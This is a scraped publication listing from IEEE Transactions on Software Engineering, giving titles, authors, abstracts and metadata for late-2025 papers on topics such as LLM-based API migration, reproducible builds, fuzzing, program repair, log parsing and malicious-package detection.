
Latest Publications in IEEE Transactions on Software Engineering

Automated Update of Android Deprecated API Usages With Large Language Models
IF 5.6 · CAS Tier 1, Computer Science · Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING · Pub Date: 2025-11-03 · DOI: 10.1109/TSE.2025.3627897
Tarek Mahmud;Bin Duan;Meiru Che;Awatif Yasmin;Anne H. H. Ngu;Guowei Yang
Android apps rely on application programming interfaces (APIs) to access various functionalities of Android devices. These APIs, however, are regularly updated to incorporate new features, while old APIs are deprecated. Even though the importance of updating deprecated API usages with the recommended replacement APIs has been widely recognized, performing such updates is non-trivial. As a result, deprecated API usages linger in Android apps and cause compatibility issues in practice. This paper introduces GUPPY, an automated approach that utilizes large language models (LLMs) to update Android deprecated API usages. By employing carefully crafted Chain-of-Thought prompts, GUPPY leverages GPT-4, one of the most powerful LLMs, to update deprecated-API usages, ensuring compatibility in both the old and new API levels. Additionally, GUPPY uses GPT-4 to generate tests, identify incorrect updates, and refine the API usage through an iterative process until the tests pass or a specified limit is reached. Our evaluation, conducted on 360 benchmark API usages from 20 deprecated APIs and an additional 156 deprecated API usages from the latest API levels 33 and 34, demonstrates GUPPY’s advantages over the state-of-the-art techniques.
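The generate-test-refine loop the abstract describes can be sketched as below. This is a hypothetical illustration, not the paper's implementation: a real run would call GPT-4, while here the "LLM" is a stub that applies one known Android migration (`WindowManager#getDefaultDisplay()`, deprecated in API 30, to `Context#getDisplay()`); the function names are invented for the sketch.

```python
# Hypothetical sketch of an LLM-driven update loop in GUPPY's style.
# ask_llm and run_tests are injected so the loop itself is testable.

def update_api_usage(code, ask_llm, run_tests, max_rounds=3):
    """Ask an LLM to replace a deprecated API usage, then re-test and
    re-prompt until the tests pass or the round limit is reached."""
    candidate = ask_llm(f"Update deprecated API usage:\n{code}")
    for _ in range(max_rounds):
        ok, feedback = run_tests(candidate)
        if ok:
            return candidate
        candidate = ask_llm(f"Fix this update ({feedback}):\n{candidate}")
    return None  # give up after the round limit

# Stub "LLM": rewrites one real deprecated call to its replacement.
def fake_llm(prompt):
    return prompt.splitlines()[-1].replace("getDefaultDisplay()", "getDisplay()")

# Stub test oracle: passes once the deprecated call is gone.
def fake_tests(code):
    return ("getDefaultDisplay" not in code, "still uses deprecated API")

fixed = update_api_usage("wm.getDefaultDisplay().getSize(p);", fake_llm, fake_tests)
```

In the paper's setting the test oracle is itself LLM-generated; the stub above only stands in for that feedback signal.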
IEEE Transactions on Software Engineering, vol. 52, no. 1, pp. 70-85.
Citations: 0
Causes and Canonicalization of Unreproducible Builds in Java
IF 5.6 · CAS Tier 1, Computer Science · Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING · Pub Date: 2025-11-03 · DOI: 10.1109/TSE.2025.3627891
Aman Sharma;Benoit Baudry;Martin Monperrus
The increasing complexity of software supply chains and the rise of supply chain attacks have elevated concerns around software integrity. Users and stakeholders face significant challenges in validating that a given software artifact corresponds to its declared source. Reproducible Builds address this challenge by ensuring that independently performed builds from identical source code produce identical binaries. However, achieving reproducibility at scale remains difficult, especially in Java, due to a range of non-deterministic factors and caveats in the build process. In this work, we focus on reproducibility in Java-based software, archetypal of enterprise applications. We introduce a conceptual framework for reproducible builds, analyze a large dataset from Reproducible Central, and develop a novel taxonomy of six root causes of unreproducibility. We study actionable mitigations: artifact and bytecode canonicalization using OSS-Rebuild and jNorm, respectively. Finally, we present Chains-Rebuild (an improved OSS-Rebuild), a tool that raises reproducibility success from 9.48% to 26.60% on 12,803 unreproducible artifacts. To sum up, our contributions are the first large-scale taxonomy of build unreproducibility causes in Java, a publicly available dataset of unreproducible builds, and Chains-Rebuild, a canonicalization tool for mitigating unreproducible builds in Java.
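The core reproducibility check, and one canonicalization step of the kind the paper studies, can be sketched as follows. The `Build-Time` header and the regex are illustrative assumptions for the sketch, not jNorm's or OSS-Rebuild's actual rules; they stand in for a classic root cause, embedded build timestamps.

```python
# Sketch: two builds of identical source differ only in an embedded
# timestamp, so their hashes differ; canonicalizing the timestamp
# away makes the builds compare equal.
import hashlib
import re

def digest(artifact: bytes) -> str:
    """Reproducibility is judged by comparing artifact hashes."""
    return hashlib.sha256(artifact).hexdigest()

def canonicalize(artifact: bytes) -> bytes:
    """Normalize embedded build timestamps to a fixed value."""
    return re.sub(rb"Build-Time: \d+", b"Build-Time: 0", artifact)

build_a = b"class Foo {}\nBuild-Time: 1714000000\n"
build_b = b"class Foo {}\nBuild-Time: 1714003600\n"

unreproducible = digest(build_a) != digest(build_b)          # True as-is
reproducible = digest(canonicalize(build_a)) == digest(canonicalize(build_b))
```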
IEEE Transactions on Software Engineering, vol. 52, no. 1, pp. 54-69. Open-access PDF: https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=11223991
Citations: 0
Spatial Semantic Fuzzing for LiDAR-Based Autonomous Driving Perception Systems
IF 5.6 · CAS Tier 1, Computer Science · Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING · Pub Date: 2025-10-31 · DOI: 10.1109/TSE.2025.3627580
An Guo;Zhiwei Su;Xinyu Gao;Chunrong Fang;Senrong Wang;Haoxiang Tian;Wu Wen;Lei Ma;Zhenyu Chen
Autonomous driving systems (ADSs) have the potential to enhance safety through advanced perception and reaction capabilities, reduce emissions by alleviating congestion, and contribute to various improvements in quality of life. Despite significant advancements in ADSs, several real-world accidents resulting in fatalities have occurred due to failures in the autonomous driving perception modules. As a critical component of autonomous vehicles, LiDAR-based perception systems are marked by high complexity and low interpretability, necessitating the development of effective testing methods for these systems. Current testing methods largely depend on manual data collection and labeling, which restricts their ability to detect a diverse range of erroneous behaviors. This process is not only time-consuming and labor-intensive, but it may also result in the recurrent discovery of similar erroneous behaviors during testing, hindering a comprehensive assessment of the systems. In this paper, we propose and implement a fuzzing framework for LiDAR-based autonomous driving perception systems, named LDFuzz, grounded in metamorphic testing theory. This framework offers the first uniform solution for the automated generation of tests with oracle information. To enhance testing efficiency and increase the number of tests that identify erroneous behaviors, we incorporate spatial and semantic coverage based on the characteristics of point cloud data to guide the generation process. We evaluate the performance of LDFuzz through experiments conducted on four LiDAR-based autonomous driving perception systems designed for the 3D object detection task. The experimental results demonstrate that the tests produced by LDFuzz can effectively detect an average of 7.5% more erroneous behaviors within LiDAR-based perception systems than the optimal baseline. Furthermore, the findings indicate that LDFuzz significantly enhances the diversity of failed tests.
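The metamorphic-testing idea the abstract grounds LDFuzz in can be illustrated with a toy relation. The "detector" below is a trivial stand-in, not a real 3D perception model, and the relation itself is an assumed example: inserting a new, non-overlapping object into a point cloud should not make previously detected objects disappear.

```python
# Toy metamorphic relation for point-cloud perception testing.
from collections import Counter

def toy_detector(points):
    """'Detect' an object wherever >= 3 points fall in one integer cell."""
    cells = Counter((int(x), int(y)) for x, y, z in points)
    return {cell for cell, n in cells.items() if n >= 3}

scene = [(1.1, 1.2, 0.0), (1.3, 1.4, 0.1), (1.2, 1.1, 0.2)]    # one object
before = toy_detector(scene)

# Mutation: insert a far-away object (no overlap with the scene).
inserted = [(8.0, 8.0, 0.0), (8.2, 8.1, 0.1), (8.1, 8.3, 0.2)]
after = toy_detector(scene + inserted)

# Metamorphic oracle: everything detected before must still be detected.
relation_holds = before <= after
```

A fuzzer in this style reports an erroneous behavior whenever the relation is violated, so no manually labeled ground truth is needed.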
IEEE Transactions on Software Engineering, vol. 52, no. 1, pp. 187-205.
Citations: 0
A Comprehensive Study of Bugs in Relational DBMS
IF 5.6 · CAS Tier 1, Computer Science · Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING · Pub Date: 2025-10-31 · DOI: 10.1109/TSE.2025.3625300
Shuang Liu;Ruifeng Wang;Yuanfeng Xie;Junjie Chen;Wei Lu;Xiao Zhang;Quanqing Xu;Chuanhui Yang;Xiaoyong Du
Relational Database Management Systems (RDBMSs) are crucial infrastructures supporting a wide range of applications, making bug mitigation within these systems essential. This study presents the first comprehensive analysis of bugs in three popular open-source RDBMSs: MySQL, SQLite, and openGauss. We manually examined 777 bugs across four dimensions, i.e., bug root causes, bug symptoms, bug distribution across modules, and the correlations between the studied aspects. We also analyzed the bug-triggering SQL statements to uncover test cases that cannot be generated by existing tools. We distill 12 findings that shed light on the development, maintenance, and testing of RDBMSs. Particularly, our findings reveal that bugs related to SQL data types and complex features, such as database triggers, procedures, and database parameter settings, present significant opportunities for enhancing RDBMS bug detection and mitigation. Leveraging these insights, we developed a tool, SQLT, which effectively identified eight RDBMS bugs (five type-related), all verified by developers, with four subsequently fixed.
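As a flavour of the type-related behavior the study highlights, SQLite's documented type-affinity rules already make the "same" comparison context-dependent. The probe below is an illustration of such semantics, not one of the paper's reported bugs: a bare text-vs-integer comparison is false, while the same text value inserted into an INTEGER-affinity column is coerced and compares equal.

```python
# Probe SQLite's type-affinity semantics with an in-memory database.
import sqlite3

con = sqlite3.connect(":memory:")

# Bare expression: SQLite never implicitly converts, so TEXT '1' != INTEGER 1.
(bare,) = con.execute("SELECT '1' = 1").fetchone()

# Column with INTEGER affinity: '1' is coerced to the integer 1 on insert,
# so the comparison now succeeds.
con.execute("CREATE TABLE t (v INTEGER)")
con.execute("INSERT INTO t VALUES ('1')")
(coerced,) = con.execute("SELECT v = 1 FROM t").fetchone()

print(bare, coerced)  # the same logical comparison, two different answers
```

Tools like the study's SQLT exploit exactly this kind of context sensitivity to craft type-focused test cases.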
IEEE Transactions on Software Engineering, vol. 51, no. 12, pp. 3654-3668.
Citations: 0
Directed Grammar-Based Test Generation
IF 5.6 · CAS Tier 1, Computer Science · Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING · Pub Date: 2025-10-30 · DOI: 10.1109/TSE.2025.3627220
Lukas Kirschner;Ezekiel Soremekun
Context: To effectively test complex software, it is important to generate goal-specific inputs, i.e., inputs that achieve a specific testing goal. For instance, developers may intend to target one or more testing goals during testing, such as generating complex inputs or triggering new or error-prone behaviors. Problem: However, most state-of-the-art test generators are not designed to target specific goals. Notably, grammar-based test generators, which (randomly) produce syntactically valid inputs via an input specification (i.e., grammar), have a low probability of achieving an arbitrary testing goal. Aim: This work addresses this challenge by proposing an automated test generation approach (called FdLoop) which iteratively learns relevant input properties from existing inputs to drive the generation of goal-specific inputs. Method: The main idea of our approach is to leverage test feedback to generate goal-specific inputs via a combination of evolutionary testing and grammar learning. FdLoop automatically learns a mapping between input structures and a specific testing goal; such mappings allow it to generate inputs that target the goal at hand. Given a testing goal, FdLoop iteratively selects, evolves, and learns the input distribution of goal-specific test inputs via test feedback and a probabilistic grammar. We concretize FdLoop for four testing goals, namely unique code coverage, input-to-code complexity, program failures (exceptions), and long execution time. We evaluate FdLoop using three well-known input formats (JSON, CSS, and JavaScript) and 20 open-source software projects. Results: In most (86%) settings, FdLoop outperforms all five tested baselines, namely the baseline grammar-based test generators (random, probabilistic, and inverse-probabilistic methods), EvoGFuzz, and DynaMOSA. FdLoop is up to twice (2X) as effective as the best baseline (EvoGFuzz) in inducing erroneous behaviors.
In addition, we show that the main components of FdLoop (i.e., input mutator, grammar mutator and test feedbacks) contribute positively to its effectiveness. We also observed that FdLoop is effective across varying parameter settings – the number of initial seed inputs, the number of generated inputs, the number of input generations and varying random seed values. Implications: Finally, our evaluation demonstrates that FdLoop effectively achieves single testing goals (revealing erroneous behaviors, generating complex inputs, or inducing long execution time) and scales to multiple testing goals.
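The probabilistic-grammar mechanism named in the Method section can be sketched as follows. The grammar, the production weights, and the depth cutoff are illustrative assumptions, not FdLoop's learned values; in the real approach the weights would be updated from test feedback to bias generation toward the testing goal.

```python
# Sketch: sampling inputs from a weighted (probabilistic) grammar.
import random

# Each nonterminal maps to (production, weight) pairs. In FdLoop's style,
# the weights would be learned so goal-hitting structures become likelier.
GRAMMAR = {
    "<value>": [(["<number>"], 0.5), (["[", "<value>", "]"], 0.5)],
    "<number>": [(["0"], 0.7), (["7"], 0.3)],
}

def generate(symbol, rng, depth=0):
    if symbol not in GRAMMAR:           # terminal symbol
        return symbol
    rules, weights = zip(*GRAMMAR[symbol])
    if depth > 5:                       # force termination: take the first
        rules, weights = (rules[0],), (1.0,)  # (non-recursive) production
    rule = rng.choices(rules, weights)[0]
    return "".join(generate(s, rng, depth + 1) for s in rule)

rng = random.Random(0)
samples = [generate("<value>", rng) for _ in range(5)]
```

Adjusting the weights (e.g., raising the recursive `[ <value> ]` production) directly skews generation toward deeper, more complex inputs, which is how a learned distribution can steer tests toward a goal.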
IEEE Transactions on Software Engineering, vol. 51, no. 12, pp. 3669-3691.
Citations: 0
Computation Tree Logic Guided Program Repair
IF 5.6 · CAS Tier 1, Computer Science · Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING · Pub Date: 2025-10-27 · DOI: 10.1109/TSE.2025.3625772
Yu Liu;Yahui Song;Martin Mirchev;Abhik Roychoudhury
Temporal logics like Computation Tree Logic (CTL) have been widely used as expressive formalisms to capture rich behavioural specifications. CTL can express properties such as reachability, termination, invariants and responsiveness, which are difficult to test. This paper suggests a mechanism for the automated repair of infinite-state programs guided by CTL properties. Our produced patches avoid the overfitting issue that occurs in test-suite-guided repair, where the repaired code may not pass tests outside the given test suite. To realise this vision, we propose a novel find-and-fix framework based on Datalog, a widely used domain-specific language for program analysis, which readily supports nested fixed-point semantics of CTL via stratified negation. Specifically, our framework encodes the program and CTL properties into Datalog facts and rules and performs the repair by modifying the facts to pass the analysis rules. In the framework, to achieve both analysis and repair results, we adapt existing techniques, including loop summarisation and Symbolic Execution of Datalog (SEDL), with key modifications. Our approach achieves analysis accuracy of 56.6% on a CTL verification benchmark and 88.5% on a termination/responsiveness benchmark, surpassing the best baseline performances of 27.7% and 76.9%, respectively.
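The fixed-point semantics that make Datalog a natural host for CTL can be illustrated with the simplest CTL operator, EF p ("p is reachable along some path"), which is exactly transitive-closure reachability. The sketch below is a toy least-fixed-point evaluation in the spirit of Datalog's semantics, not the paper's actual encoding.

```python
# EF p as a least fixed point: a state satisfies EF p if p holds there,
# or some successor satisfies EF p. Iterate the rule to saturation.
def ef(edges, holds_p):
    sat = set(holds_p)                  # base case: states where p holds
    changed = True
    while changed:                      # naive fixed-point iteration
        changed = False
        for s, t in edges:
            if t in sat and s not in sat:
                sat.add(s)              # rule: EF(s) :- edge(s, t), EF(t)
                changed = True
    return sat

# Toy transition system: 0 -> 1 -> 2, and 3 only loops on itself.
edges = {(0, 1), (1, 2), (3, 3)}
reachable_p = ef(edges, {2})            # states satisfying EF p for p = {2}
```

Nested CTL operators (e.g., AG, which universally quantifies over paths) need negation of such fixed points, which is where the stratified negation mentioned in the abstract comes in.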
IEEE Transactions on Software Engineering, vol. 52, no. 1, pp. 321-337. Open-access PDF: https://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=11218954
Citations: 0
SemanticLog: Towards Effective and Efficient Large-Scale Semantic Log Parsing
IF 5.6 · CAS Tier 1, Computer Science · Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING · Pub Date: 2025-10-24 · DOI: 10.1109/TSE.2025.3625121
Chenbo Zhang;Wenying Xu;Jinbu Liu;Lu Zhang;Guiyang Liu;Jihong Guan;Qi Zhou;Shuigeng Zhou
Logs of large-scale cloud systems record diverse system events, ranging from routine statuses to critical errors. As the fundamental step of automated log analysis, log parsing transforms unstructured logs into structured data for easier management and analysis. However, existing syntax-based and deep learning-based parsers struggle with complex real-world logs. Recent parsers based on large language models (LLMs) achieve higher accuracy, but they typically rely on online APIs (e.g., ChatGPT), raising privacy concerns and incurring network latency. Moreover, with the rise of artificial intelligence for IT operations (AIOps), traditional parsers that focus on syntax-level templates fail to capture the semantics of dynamic log parameters, limiting their usefulness for downstream tasks. These challenges highlight the need for semantic log parsing that goes beyond template extraction to understand parameter semantics. This paper presents SemanticLog, an effective and efficient semantic log parser powered by open-source LLMs. SemanticLog adapts the structure of LLMs to the log parsing task, leveraging their rich knowledge while safeguarding log data privacy. It first extracts informative feature representations from log data, then refines them through fine-grained semantic perception to enable accurate template and parameter extraction together with semantic category prediction. To boost scalability, SemanticLog introduces the EffiParsing tree for faster inference on large-scale logs. Extensive experiments on the LogHub-2.0 dataset show that SemanticLog significantly outperforms the state-of-the-art log parsers in terms of accuracy. Moreover, it also surpasses existing LLM-based parsers in efficiency while showcasing advanced semantic parsing capability. Notably, SemanticLog employs much smaller open-source LLMs compared to existing LLM-based parsers (mainly based on ChatGPT), while maintaining better capability of log data privacy protection.
{"title":"SemanticLog: Towards Effective and Efficient Large-Scale Semantic Log Parsing","authors":"Chenbo Zhang;Wenying Xu;Jinbu Liu;Lu Zhang;Guiyang Liu;Jihong Guan;Qi Zhou;Shuigeng Zhou","doi":"10.1109/TSE.2025.3625121","DOIUrl":"10.1109/TSE.2025.3625121","url":null,"abstract":"Logs of large-scale cloud systems record diverse system events, ranging from routine statuses to critical errors. As the fundamental step of automated log analysis, log parsing is to transform unstructured logs into structured data for easier management and analysis. However, existing syntax-based and deep learning-based parsers struggle with complex real-world logs. Recent parsers based on large language models (LLMs) achieve higher accuracy, but they typically rely on online APIs (e.g., ChatGPT), raising privacy concerns and suffering from network latency. Moreover, with the rise of artificial intelligence for IT operations (AIOps), traditional parsers that focus on syntax-level templates fail to capture the semantics of dynamic log parameters, limiting their usefulness for downstream tasks. These challenges highlight the need for semantic log parsing that goes beyond template extraction to understand parameter semantics. This paper presents <bold>SemanticLog</b>, an effective and efficient semantic log parser powered by open-source LLMs. SemanticLog adapts the structure of LLMs to the log parsing task, leveraging their rich knowledge while safeguarding log data privacy. It first extracts informative feature representations from log data, then refines them through fine-grained semantic perception to enable accurate template and parameter extraction together with semantic category prediction. To boost scalability, SemanticLog introduces the EffiParsing tree for faster inference on large-scale logs. Extensive experiments on the LogHub-2.0 dataset show that SemanticLog significantly outperforms the state-of-the-art log parsers in terms of accuracy. Moreover, it also surpasses existing LLM-based parsers in efficiency while showcasing advanced semantic parsing capability. Notably, SemanticLog employs much smaller open-source LLMs compared to existing LLM-based parsers (mainly based on ChatGPT), while maintaining better capability of log data privacy protection.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"155-170"},"PeriodicalIF":5.6,"publicationDate":"2025-10-24","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145381322","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Cited by: 0
Contrasting the Hyperparameter Tuning Impact Across Software Defect Prediction Scenarios
IF 7.4 CAS Tier 1 (Computer Science) Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date: 2025-10-23 DOI: 10.1109/tse.2025.3624631
Mohamed Sami Rakha, Andriy Miranskyy, Daniel Alencar da Costa
{"title":"Contrasting the Hyperparameter Tuning Impact Across Software Defect Prediction Scenarios","authors":"Mohamed Sami Rakha, Andriy Miranskyy, Daniel Alencar da Costa","doi":"10.1109/tse.2025.3624631","DOIUrl":"https://doi.org/10.1109/tse.2025.3624631","url":null,"abstract":"","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"63 1","pages":""},"PeriodicalIF":7.4,"publicationDate":"2025-10-23","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145397747","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Cited by: 0
Detecting Malicious Packages in PyPI and NPM by Clustering Installation Scripts
IF 5.6 CAS Tier 1 (Computer Science) Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date: 2025-10-23 DOI: 10.1109/TSE.2025.3618952
Wentao Liang;Xiang Ling;Chen Zhao;Jingzheng Wu;Tianyue Luo;Yanjun Wu
Software repositories such as PyPI and npm are vital for software development but expose users to serious security risks from malicious packages. Malicious packages often execute their payloads immediately upon installation, leading to rapid system compromise. Existing detection methods depend heavily on explicit knowledge that is difficult to obtain, rendering them susceptible to overlooking emergent malicious packages. In this paper, we present a lightweight and effective method, namely EMPHunter, to detect malicious packages without requiring any explicit prior knowledge. EMPHunter is founded upon two fundamental and insightful observations: first, malicious packages are considerably rarer than benign ones; second, the functionality of installation scripts for malicious packages diverges significantly from that of benign packages, whose scripts frequently form clusters. Consequently, EMPHunter uses clustering to group the unique installation scripts of newly uploaded packages and identifies outliers as candidate malicious packages. It then ranks the outliers according to their degree of deviation and the distance between each of them and known malicious instances, effectively highlighting potential malicious packages. With EMPHunter, we successfully identified 122 previously unknown malicious packages from a pool of 267,009 newly uploaded PyPI and npm packages, achieving an mAP (mean average precision) of 0.813 and an exceptional recall of 0.992 when auditing the top-10 rankings. All detected packages have been officially confirmed as genuine malicious packages by PyPI and npm. We assert that EMPHunter offers a valuable and advantageous supplement to existing detection tools, augmenting the arsenal of software supply chain security analysis.
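The clustering-and-outlier idea described above can be sketched as follows. This is a minimal illustration under assumed design choices: character-shingle fingerprints and a Jaccard similarity threshold are stand-ins for EMPHunter's actual features, and the sample scripts are hypothetical.

```python
# Hedged sketch of install-script outlier detection (illustrative, not EMPHunter):
# benign install scripts tend to form dense clusters of near-duplicates, so a
# script with no close neighbor is flagged as a candidate malicious package.

def shingles(text: str, k: int = 4) -> set:
    """Character k-gram set used as a cheap script fingerprint."""
    return {text[i:i + k] for i in range(max(1, len(text) - k + 1))}

def jaccard(a: set, b: set) -> float:
    """Jaccard similarity of two fingerprint sets."""
    return len(a & b) / len(a | b) if a or b else 1.0

def find_outliers(scripts, threshold=0.5):
    """Return indices of scripts with no sufficiently similar neighbor."""
    fps = [shingles(s) for s in scripts]
    return [
        i for i, fp in enumerate(fps)
        if all(jaccard(fp, other) < threshold
               for j, other in enumerate(fps) if j != i)
    ]

scripts = [
    "from setuptools import setup\nsetup(name='pkg_a')",
    "from setuptools import setup\nsetup(name='pkg_b')",   # near-duplicate of the first
    "import os; os.system('curl http://evil.example | sh')",  # diverges from the cluster
]
print(find_outliers(scripts))  # only the third script lacks a near-duplicate -> [2]
```

A second ranking pass, as the abstract describes, would then order these outliers by how far they deviate and how close they sit to known malicious examples.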
{"title":"Detecting Malicious Packages in PyPI and NPM by Clustering Installation Scripts","authors":"Wentao Liang;Xiang Ling;Chen Zhao;Jingzheng Wu;Tianyue Luo;Yanjun Wu","doi":"10.1109/TSE.2025.3618952","DOIUrl":"10.1109/TSE.2025.3618952","url":null,"abstract":"Software repositories such as PyPI and npm are vital for software development but expose users to serious security risks from malicious packages. The malicious packages often execute their payloads immediately upon installation, leading to rapid system compromise. Existing detection methods are heavily dependent on difficult-to-obtain explicit knowledge, rendering them susceptible to overlooking emergent malicious packages. In this paper, we present a lightweight and effective method, namely EMPHunter, to detect malicious packages without requiring any explicit prior knowledge. EMPHunter is founded upon two fundamental and insightful observations. First, malicious packages are considerably rarer than benign ones, and second, the functionality of installation scripts for malicious packages diverges significantly from those of benign packages, with the latter frequently forming clusters. Consequently, EMPHunter utilizes the clustering technique to group the unique installation scripts of new-uploaded packages and identifies outliers as candidate malicious packages. It then ranks the outliers according to their deviate degrees and the distance between each of them and known malicious instances, effectively highlighting potential malicious packages. With EMPHunter, we successfully identified 122 previously unknown malicious packages from a pool of 267,009 newly-uploaded PyPI and npm packages, achieving an mAP (Mean Average Precision) of 0.813 and an exceptional recall of 0.992 when auditing the top-10 rankings. All detected packages have been officially confirmed as genuine malicious package by PyPI and npm. We assert that EMPHunter offers a valuable and advantageous supplement to existing detection tools, augmenting the arsenal of software supply chain security analysis.","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"52 1","pages":"36-53"},"PeriodicalIF":5.6,"publicationDate":"2025-10-23","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145397750","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Cited by: 0
Unadmitted Technical Debt: Dataset and Detection Approaches
IF 7.4 CAS Tier 1 (Computer Science) Q1 COMPUTER SCIENCE, SOFTWARE ENGINEERING Pub Date: 2025-10-20 DOI: 10.1109/tse.2025.3623644
Dongjin Yu, Yihang Xu, Xin Chen, Quanxin Yang, Sixuan Wang
{"title":"Unadmitted Technical Debt: Dataset and Detection Approaches","authors":"Dongjin Yu, Yihang Xu, Xin Chen, Quanxin Yang, Sixuan Wang","doi":"10.1109/tse.2025.3623644","DOIUrl":"https://doi.org/10.1109/tse.2025.3623644","url":null,"abstract":"","PeriodicalId":13324,"journal":{"name":"IEEE Transactions on Software Engineering","volume":"55 1","pages":""},"PeriodicalIF":7.4,"publicationDate":"2025-10-20","publicationTypes":"Journal Article","fieldsOfStudy":null,"isOpenAccess":false,"openAccessPdf":"","citationCount":null,"resultStr":null,"platform":"Semanticscholar","paperid":"145397874","PeriodicalName":null,"FirstCategoryId":null,"ListUrlMain":null,"RegionNum":1,"RegionCategory":"计算机科学","ArticlePicture":[],"TitleCN":null,"AbstractTextCN":null,"PMCID":"","EPubDate":null,"PubModel":null,"JCR":null,"JCRName":null,"Score":null,"Total":0}
Cited by: 0